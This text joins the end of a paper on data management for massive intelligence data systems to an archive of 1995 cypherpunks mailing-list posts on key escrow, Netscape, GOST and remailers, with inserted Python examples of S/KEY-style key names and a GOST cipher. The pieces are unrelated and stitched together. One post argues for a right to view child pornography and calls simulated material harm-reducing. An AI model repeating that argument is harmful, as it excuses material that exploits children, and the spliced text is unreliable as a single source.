desired in many new generation applications.  For example, the structures of the
entities in the database could change with time.  An entity could acquire new
attributes or existing attributes could be deleted. The metadata needs to be
represented in a manner that would facilitate schema evolution. That is,
appropriate models to represent the metadata are desired. Since the metadata has
to be accessed for all of the functions of a DBMS, the module that is
responsible for accessing the metadata needs to communicate with all the other
modules. Efficient implementation of this module is necessary to avoid
performance bottlenecks. 

Certain types of metadata, such as the schemas, are usually accessible to the
external users.  An issue here is whether to provide a view to the users that is
different from the system's view of the metadata.  For example, a different
representation of the metadata could be used for the users.  Also, if the
metadatabase is massive, then subsets of it could be presented to the users.    

4.5  Integrity
Concurrency control and recovery issues discussed in section 4.3 are some of the
issues that need to be dealt with in order to maintain the integrity  (i.e.
consistency) of the database. Other types of integrity include maintaining the
referential integrity of entities and enforcing application dependent integrity
constraints. Referential integrity mechanisms must ensure that the entities
referenced exist. The question is, how could the references to an entity be
deleted when an entity itself is deleted?  If the databases are massive, then
there will probably be more references to the deleted entity. Deleting all these
references in a timely manner is an issue.

In the case of application specific integrity constraints, they could trigger a
series of updates when one or more items in the database gets updated. Again, as
the size of the database increases, the number of updates that are triggered
could also increase. The issue here is ensuring that the updates are carried out
in a timely manner. 	

4.6  Realtime / Near Realtime Processing
Within a massive digital data system, the challenges of realtime or near
realtime processing will be compounded.  For realtime or near realtime
applications, timing constraints may be enforced on the transactions and/or the
queries. In the case of a hard realtime environment, meeting the timing
constraints may cause the integrity of the data to suffer. In the case of soft
realtime constraints (also referred to as near real-time), there is greater
flexibility in meeting the deadlines. The issues for real-time processing
include:

  - If a transaction misses its deadline, then what are the actions that could
    be taken?
  - Could a value function be associated with a transaction which can be used
    to determine whether the transaction should continue after it misses its
    deadline?
  - Could the transaction be aborted if the value of the data approaches zero?
  - What is the impact on the scheduling algorithms when timing constraints are
    present?
  - How can the techniques be extended for a distributed/federated
    architecture?
  - In the case of realtime updates in a distributed replicated environment, is
    it possible to maintain the consistency of the replicated copies and still
    meet the timing constraints?
  - What is the impact on the techniques for multimedia data processing?

4.7  Multimedia Data Processing
By nature, multimedia data management has to deal with many of the requirements
for indexing, browsing, retrieving, and updating of the individual media types. 
Implementing multimedia data types will require new paradigms for representing,
storing, processing, accessing, manipulating, visualizing, and displaying data
from various sources in different media. One of the major issues here is
synchronizing the display of different media types such as voice and video. 
Other issues include selecting/developing appropriate data models for
representing the multimedia data and developing appropriate indexing techniques
such as maintaining indexes on textual, voice, and video patterns.  For example,
the ability to index voice and video simultaneously may be desired.  

In addition to the manipulation of multimedia data, frameworks for the
integration of multimedia objects as well as handling different granularity of
multimedia objects (i.e., 1 hour video clip versus a spreadsheet cell) need to
be considered. A flexible environment has to be provided so that the linked and
embedded distributed multimedia objects can accommodate geographic/network
changes.  Finally, the data manipulation techniques as well as the frameworks
need to be extensible to support new and diverse data types.  

4.8  Backup and Recovery
On-line backup procedures are being used for massive databases. This is because
off-line procedures will consume too much time for massive databases. Even if
the backup procedures are carried out on-line, the system could be slowed down
and therefore the performance of other data management functions would suffer.
The issue here is to develop improved techniques for backup so that it will not
impact functions such as querying, browsing, and updating. 

Recovery issues for transaction management were discussed in section 4.3. Other
recovery issues include whether to maintain multiple copies of the database, and
if so, the number of copies to be maintained, and whether the checkpointing,
roll-back and recovery procedures proposed for traditional databases could be
used for massive databases or is there a need to develop special mechanisms?

5.0  SUMMARY

Massive digital data systems will require effective management, retrieval, and
integration of databases which are possibly heterogeneous in nature. Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management. While hardware is rapidly
advancing to provide massive data storage, processing, and transmission, the
software necessary for the retrieval, integration, and management of data
remains an enormous challenge.

This paper has identified a set of issues for managing the data in massive
digital data systems with a focus on intelligence applications. First, an
overview of the current approaches to data management and the scalability of the
current approaches were discussed. Then some architectural and data modeling
issues were given. Finally, a discussion of the issues for the various functions
of MDDS was given. The set of issues identified is by no means considered a
complete list. As the progression of research, prototyping, and deployments
continues, new or hidden challenges will arise. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 23 Nov 95 06:32:25 PST
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <199511231334.OAA00460@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want a 
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.

There is a patent by someone (I think it was IBM) on how to pack RSA
keys in small space.  I think they were putting them on the magnetic
strips that you have behind every card.  I'm afraid I don't have the
patent number saved, but I have seen the patent document myself at the
patent office.  No, I'm afraid I don't remember how they encoded it.

Using that method (or something similar), you could probably encode
the keys into acceptably short strings with S/KEY-style encoding.

    Tatu
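
The exchange above asks for a short, unforgeable key name that fits on a
business card, and the reply suggests S/KEY-style word encoding. The sketch
below is an added example, not code from either poster: it assumes the name is
a truncated SHA-256 digest of the encoded public key, and it uses a constructed
2048-syllable list in place of the real S/KEY dictionary. The key blobs are
constructed stand-ins.

```python
import hashlib
import hmac

# Constructed 2048-entry word list (16 onsets x 8 vowels x 16 codas). It stands
# in for the fixed 2048-word S/KEY dictionary so the example is self-contained.
ONSETS = "b d f g h j k l m n p r s t v z".split()
VOWELS = "a e i o u ai ee oo".split()
CODAS = "b d f k l m n p r s t v z sh th ch".split()
WORDS = [o + v + c for o in ONSETS for v in VOWELS for c in CODAS]
INDEX = {w: i for i, w in enumerate(WORDS)}


def checksum(block):
    """S/KEY-style check: sum of the 32 two-bit pairs of a 64-bit value, mod 4."""
    return sum((block >> shift) & 3 for shift in range(0, 64, 2)) & 3


def encode_block(block):
    """64 bits + 2 check bits = 66 bits = six 11-bit word indexes."""
    value = (block << 2) | checksum(block)
    return [WORDS[(value >> shift) & 0x7FF] for shift in range(55, -1, -11)]


def decode_block(words):
    """Inverse of encode_block; raises ValueError on a bad word or checksum."""
    if len(words) != 6:
        raise ValueError("a block is exactly six words")
    value = 0
    for word in words:
        if word.lower() not in INDEX:
            raise ValueError("unknown word: %r" % word)
        value = (value << 11) | INDEX[word.lower()]
    block, check = value >> 2, value & 3
    if checksum(block) != check:
        raise ValueError("checksum mismatch (mistyped or misheard word)")
    return block


def key_name(public_key, blocks=2):
    """Name a key by the first 64*blocks bits of SHA-256 over its encoding.

    Assumption of this example: the name is a hash of the key, so forging a
    name means finding another key with the same truncated digest.
    """
    digest = hashlib.sha256(public_key).digest()
    words = []
    for i in range(blocks):
        words += encode_block(int.from_bytes(digest[8 * i:8 * i + 8], "big"))
    return " ".join(words)


def verify_key_name(public_key, name):
    """True only if `name` decodes cleanly and matches this key's digest."""
    words = name.split()
    if not words or len(words) % 6:
        return False
    try:
        claimed = b"".join(
            decode_block(words[i:i + 6]).to_bytes(8, "big")
            for i in range(0, len(words), 6))
    except ValueError:
        return False
    actual = hashlib.sha256(public_key).digest()[:len(claimed)]
    return hmac.compare_digest(claimed, actual)


# Constructed stand-ins for two encoded public keys (not real key material).
ALICE_KEY = b"constructed public key blob #1"
MALLORY_KEY = b"constructed public key blob #2"

if __name__ == "__main__":
    name = key_name(ALICE_KEY)
    print(name)
    print(verify_key_name(ALICE_KEY, name), verify_key_name(MALLORY_KEY, name))
```

The two check bits per block only catch transcription slips; resistance to a
substituted key comes from the digest length, which is why the default here is
two blocks (128 bits, twelve words) rather than one.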




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Fri, 24 Nov 95 18:56:59 PST
To: moroni@scranton.com
Subject: Re: crypto for porno users
Message-ID: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: IN%"moroni@scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13

>I wish we could get off the subject of the kiddie porn, it makes
>me wonder what people on this list are doing when they are not
>mailing out letters. Not to flame, BUT it is such a serious issue
>and we all as adults and approaching adults should not treat it as
>an academic issue. It is the most victimizing of all crimes and
>I think I speak for some of us when I say that it would be better
>if we all found a way to get back to discussing the problems of
>cryptography as related to we not pornographers.

     I can see one argument that one should not discuss such
unpopular topics. That argument is that the person who brought them
up may act as a (hopefully inadvertent) _agent provocateur_ for
those who would condemn cryptography for protecting child
pornography and similarly unaccepted practices. However, I regard
self-censorship in reaction to fears of government as as evil as
governmental censorship. Consequently, I would like to give two
counterarguments to the idea that child pornography is not
something that should be cryptographically protected.
     The first is that one may legitimately disagree with the
government on what is child pornography. For instance, one may
disagree on what minimum age should be used. Governments are known
for being quite incoherent on rules on sexuality and the age of
consent. For instance, Britain's age for consent depends on the
type of sexuality involved; heterosexual sex receives a more
lenient age (18) than homosexual (21). (There are also, of course,
difficulties caused by such legal inconsistencies as simultaneously
deeming someone not to be of consenting age for sex yet to be
considered an adult when charged with murder; I refer to the
infamous Bobbit (sp?) trials).
     The second is that given new image modification technologies,
it is possible to produce what will seem child pornography, but
with no actual harm done to children. In some ways, this product
may reduce harm to children in some respects by providing a
"competing product" to actual child pornography, and thus
discourage its manufacture. Some will argue that such simulated
child pornography is useful by pedophiles in persuading children;
this argument appears similar to the one against cryptography that
it can be used for purposes generally agreed to be illegitimate. I
trust that the list does not find such an argument to be valid. I
will mention in this regard that I have no personal want to see
child pornography. However, I support the right of those who do to
do so, if no harm to others is committed.
     Sincerely Yours,
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:10:29 PST
To: jamesd@echeque.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291310.NAA27164@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the language of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:11:55 PST
To: jamesd@echeque.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291311.NAA21044@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the language of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.

Does the patent create any headaches for elliptic curve research or
publishing elliptic curve papers, or just for new products?
						Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 08:55:52 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511301654.IAA26162@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM 11/30/95 -0800, Jeff Weinstein wrote:
> All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes. 

Then we would like to hear Jim "clarify" his position.

Absent such clarification, we must assume he considers the
press reports of what he said to be reasonably accurate.

>  I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either. 

Most of the major players have taken a position overtly opposed to
GAK (whilst leaving themselves some wriggle room, should
the heat get too severe).

What is netscape's position?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 09:00:47 PST
To: "Bob Bruen, MIT Lab for Nuclear Science" <cypherpunks@toad.com
Subject: Re: cypherpunks at ietf
Message-ID: <199511301700.JAA29522@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
> SEARCH ON THE WEB.
>
> [...]
>
> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

Gee:  Someone who has not learnt to use the caps key on his computer
cannot do accurate searches, so will everyone else please get off
the net.

>
> [...]
>
> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
> PLACING ON THE WEB.

Pleasant comic relief.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Wed, 29 Nov 95 04:09:06 PST
To: Bill Stewart <cypherpunks@toad.com>
Subject: Re: GOST for sale
Message-ID: <199511291310.HAA00198@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 11:53:26 -0800, you wrote:

>At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard@sos.sll.se> wrote:
>>According to a short article in a Swedish newspaper (DN)
>>with the title 'Spy Code of KGB can make computers safe', 
>>JETICO INC., located in Finland (Tammerfors), introduced
>>a new crypto system on the world market last week. It's 
>>based on GOST, the Russian federal standard algorithm.

[..]
>From what I've read of GOST, it's really a family of cyphers with
>different sets of S-boxes - routine military gets one set, top secret
>gets another, civilian govt another, etc.  Aside from possible
>differences in security level for the S-boxes, one motivation is
>that you can't take civilian govt decryptors and use them to read
>or forge top secret military crypto, etc.  If this is correct,
>then some sets of S-boxes probably do have trapdoors (at least
>susceptibility to differential cryptanalysis); how good are the
>ones that Jetico is selling, what credentials do they have to
>convince us their cryptanalysis is good enough, and why are they
>doing parts of it in hardware?

Based on the few articles I've read, S-Boxes are generated randomly,
or (doubtful in this case) generated from the passphrase, making an
even larger keyspace.

--Rob
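
The thread above describes GOST as one cipher structure used with different
S-box sets. The sketch below is an added example, not code from either poster
or from Jetico: it follows the publicly described GOST 28147-89 round structure
for a single 8-byte block, with little-endian word order as an assumption, and
its two S-box sets, key and plaintext are constructed for the demonstration
(they are not any published GOST parameters).

```python
import hashlib
import math
import struct

MASK32 = 0xFFFFFFFF


def make_sboxes(label):
    """Eight 4-bit permutations derived from a label (constructed sets)."""
    def rank(i, v):
        return hashlib.sha256(("%s/%d/%d" % (label, i, v)).encode()).digest()
    return [sorted(range(16), key=lambda v, i=i: rank(i, v)) for i in range(8)]


def round_function(half, subkey, sboxes):
    """Add the subkey mod 2^32, substitute each nibble, rotate left 11 bits."""
    x = (half + subkey) & MASK32
    y = 0
    for i in range(8):
        y |= sboxes[i][(x >> (4 * i)) & 0xF] << (4 * i)
    return ((y << 11) | (y >> 21)) & MASK32


def subkeys(key):
    """256-bit key as eight 32-bit words: K0..K7 three times, then K7..K0."""
    if len(key) != 32:
        raise ValueError("GOST 28147-89 keys are 32 bytes")
    k = list(struct.unpack("<8I", key))
    return k * 3 + k[::-1]


def _feistel(block, schedule, sboxes):
    if len(block) != 8:
        raise ValueError("block must be 8 bytes")
    n1, n2 = struct.unpack("<2I", block)
    for subkey in schedule:
        n1, n2 = n2 ^ round_function(n1, subkey, sboxes), n1
    return struct.pack("<2I", n2, n1)  # the final round does not swap halves


def encrypt_block(block, key, sboxes):
    return _feistel(block, subkeys(key), sboxes)


def decrypt_block(block, key, sboxes):
    # Same network, subkeys applied in reverse order.
    return _feistel(block, subkeys(key)[::-1], sboxes)


def sbox_keyspace_bits():
    """log2 of the number of ways to choose eight permutations of 16 values."""
    return 8 * math.log2(math.factorial(16))


# Constructed inputs: two unrelated S-box sets sharing one key and plaintext.
SBOX_SET_A = make_sboxes("set-A")
SBOX_SET_B = make_sboxes("set-B")
KEY = bytes(range(32))
PLAINTEXT = b"8 bytes!"

if __name__ == "__main__":
    ct = encrypt_block(PLAINTEXT, KEY, SBOX_SET_A)
    print(ct.hex())
    print(decrypt_block(ct, KEY, SBOX_SET_A))   # original plaintext
    print(decrypt_block(ct, KEY, SBOX_SET_B))   # garbage: wrong S-box set
    print(round(sbox_keyspace_bits()))          # about 354 bits of parameters
```

The 354-bit figure only counts possible S-box sets; it says nothing about how
many of them resist cryptanalysis, which is the question the quoted post raises
about any particular vendor's set.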





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:19:23 PST
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: The future will be easy to use
Message-ID: <199512010519.VAA12881@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>On Tue, 28 Nov 1995, James A. Donald wrote:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?

At 12:39 PM 11/30/95 -0500, Jon Lasser wrote:
>No; you're going to steal from your enemies by having them ship things to 
>you without payment.

Why would I bother to use encryption to encrypt someone else's credit
card number?  This is like arguing that I could use a crypto book
to hit someone over the head with in order to steal their wallet,
or arguing that a firewalled computer can still be attacked with
a sledge hammer.  Irrelevant.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:49:11 PST
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <199512010549.VAA27849@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 11/30/95 -0500, hallam@w3.org wrote:
>
> Folks, lay off Netscape on this one. [...]
> 
> It is the idea that individuals be forced to 
> use it for private conversations that is the bad idea.

Jim Clark advocated Government Access to Keys:  GAK.  He
did not advocate voluntary escrow -- very few people
object to voluntary escrow.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:49:15 PST
To: Frank Stuart <cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010549.VAA27874@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> I'm working on an "obnoxify" program to convert 
> normal html documents into documents that look 
> normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
> I think tomorrow evening would be a good time to decide 
> whether or not to distribute it.

Is there any way one could set up a dirty pictures web
page in such a fashion that it would be difficult, painful,
and impractical to get at the pictures through that page
with a netscape browser?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 30 Nov 95 01:00:08 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <30BD716E.5F69@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> http://www.cnet.com/Central/News/govt.html
> 
>         Bad. Very Bad. And I was almost starting to like Netscape.

  Please don't give up on us yet.  All press accounts I've read so far
have lots of stuff attributed to Jim, but very little of it is actual
quotes.  There appears to be lots of paraphrasing and interpretation
being done on the part of the reporters.  The impression that I'm
getting is that the press has blown a couple of small sound bites
way out of proportion.  The infoworld article that covers the same
speech only devotes about 20% of the article to the key escrow topic,
and is similarly devoid of actual quotes.

  I have not spoken to Jim about this, and I did not hear the talk
myself, so I'm mostly reading between the lines here.  After I saw the
story earlier today I started asking around to see if the company
had made any major policy shift in the direction of GAK, and wasn't
able to turn up anything.  If anything it's the opposite.

  My feelings about key escrow, which were echoed by several folks
in management when I spoke to them today are:

	o Government mandated escrow would be a bad thing
	o There are some settings where escrow is good, in the corporate
		setting, or as a matter of personal choice (to protect against
		loss of password)
	o The whole issue of escrow should be de-coupled from the
		export issue

  I don't want to go down in history as a facilitator of the totalitarian
state, and I don't think anyone else here does either.  I hope folks
wait for press releases, product announcements, etc. before condemning us
too much.  Jim has made comments in the past that were quoted out of
context, and blown way out of proportion to the point that some people
believed that we were monitoring our users' every keystroke and sending
it all back to the home office to generate huge demographic databases.
I suspect that this is the same sort of thing, and I hope everyone will
judge us by what we do.

	--Jeff

PS - you won't find a LEF in the soon to be released SSL Version 3 spec...

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 30 Nov 95 08:55:17 PST
To: sameer <sameer@c2.org>
Subject: "Got a subpoena?"
In-Reply-To: <199511301606.IAA17493@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130113015.132b-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> 	Community ConneXion will comply with all properly formed court
> orders and subpoenas. We will *not* cooperate without court
> intervention. (I.e. Mr. FBI calls up and says "can you help us find
> this suspect"? I respond "got a subpoena?")

But it's not quite that simple, Sameer.  Don't underestimate the more
subtle forms of non-cooperation you can engage in.

To use the most obvious example, different remailer operators turn
different levels of logging on.  So one operator will say "Yes, I am
obligated to fully comply with your subpoena, officer.  Here are the
full logs for the last six months."  And another will say "Yes, I am
obligated to fully comply with your subpoena, officer.  However, I
keep no logs at all of the mail sent through my remailer.  Drag, huh?"

Being the eternal pessimist, I once again point out that the
government will try to stop cryptoanarchy any way they can.  Their
main tool is the law, and they WILL use it eventually when all else
fails.  Personally, I would play it safe by operating on the
assumption that basically EVERYTHING will be illegal eventually and
"finessing" laws will become more important.  In short, they WILL have
a subpoena--then what?

Of course, I personally would never do anything illegal.

   --Dave.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 95 21:55:38 PST
To: graeme@chem2.chem.swin.edu.au (Graeme Cross)
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010549.VAA18386@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I knew livescript was nasty...

> 
> 
> Talking of Netscape - this posting prompted me to forward it given the 
> security and privacy implications inherent in the problem.
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 09:59:20 PST
To: cypherpunks@toad.com
Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <199512010610.BAA15528@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this and found it interesting.  You may have seen it 
already...published in today's issue of Investor's Business Daily.

INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Fear of Internet crime is well-founded among businesses whose corporate
networks may be compromised by curious hackers or malicious crackers, but
"By and large, consumers have very little risk using and doing business on
the Internet," says the chairman of Open Market Inc.  While it is possible
to break an encryption code and crack a secured phone line to discover an
individual's credit card number, it's much easier to copy them off of
discarded carbons.  "If someone wanted to steal a credit card number, all
they would have to do is go to any gas station and look on the ground
around the pumps," says the CTO at Internet security firm Terisa Systems. 
(Investor's Business Daily 30 Nov 95 A8)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Thu, 30 Nov 95 22:12:51 PST
To: cypherpunks@toad.com
Subject: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <199512010612.BAA13976@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this interesting too.  US Position?

AUTHOR A VIRUS, GO TO JAIL
A computer cracker last week became the first virus writer sentenced to a
jail term under Great Britain's Computer Misuse Act.  The 26-year-old
perpetrator was sentenced to 18 months in jail after pleading guilty to 11
charges connected with placing virus-infected programs on computer bulletin
boards.  (Investor's Business Daily 29 Nov 95 A6)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 16:24:59 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <ace466400202100414f2@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM 12/28/95, Graeme Cross wrote:
>Talking of Netscape - this posting prompted me to forward it given the
>security and privacy implications inherent in the problem.
>
>Cheers
>Graeme
>
<SNIP>

YOW! It is beginning to look like "At Netscape, Security is Job NONE."

Something to put with the Netscape pro-GAK pages I am putting together.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 00:24:34 +0800
To: cypherpunks@toad.com
Subject: Barring access to Netscape
Message-ID: <199512010738.BAA17804@khijol>
MIME-Version: 1.0
Content-Type: text/plain


If you want to bar access to your site from a Netscape browser, such 
can easily be accomplished.  If memory serves, every browser, when 
connecting to a site, exchanges certain information about the client 
with the server.  One can gain access easily to that information.

I believe that Netscape uses "Mozilla" as their keyword when 
exchanging browser-specific information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Fri, 1 Dec 1995 15:43:46 +0800
To: Frank Stuart <loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010744.BAA18327@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 30 Nov 1995 21:43:57 -0600 (CST)
> From:          Frank Stuart <fstuart@vetmed.auburn.edu>
> To:            loki@obscura.com, cypherpunks@toad.com
> Subject:       Re: Getting a copy of the Jim Clark speech

> >If he has not clarified his position by tomorrow evening, I will set up some
> >web pages explaining the situation and decrying Netscape's apparent
> >position on key escrow (GAK). I have the quotes that L. McCarthy posted,
> >and Jeff Weinstein's response. I have not been able to get the article off
> >the server yet (possible all the cypherpunks downloading it?). Any other
> >documents I should include?
> 
> I'm working on an "obnoxify" program to convert normal html documents into
> documents that look normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
> would be a good time to decide whether or not to distribute it.

The only problem with this approach is that this will bite other 
browsers that have started supporting the so-called "Netscape 
extensions".  More than one person has coded the Netscape stuff into 
their pages because it gives the author more flexibility than the 
standard 1.0/2.0 standards.  And there aren't many browsers out there 
yet that support 3.0.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 00:27:17 +0800
To: Matt Miszewski <crypto@midex.com>
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010750.BAA18796@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 1 Dec 1995 04:40:23 -36000
> From:          Matt Miszewski <crypto@midex.com>
> Subject:       Re: Netscape gives in to key escrow
> To:            sameer <sameer@c2.org>
> Cc:            Jeff Weinstein <jsw@netscape.com>, cypherpunks@toad.com,
>                jsw@tera.netscape.com

> On Thu, 30 Nov 1995, sameer wrote:
> 
> > 	Jeff: If Netscape comes out in favor of GAK, will you leave?
> > (Wait until February, at least, of course..) You don't have to answer
> > that to me, or the list, just think about it, and answer it for
> > yourself.  Do you think "anyone else" there would leave, as you say
> > below that they don't want to go down history, etc...
> > 
> 
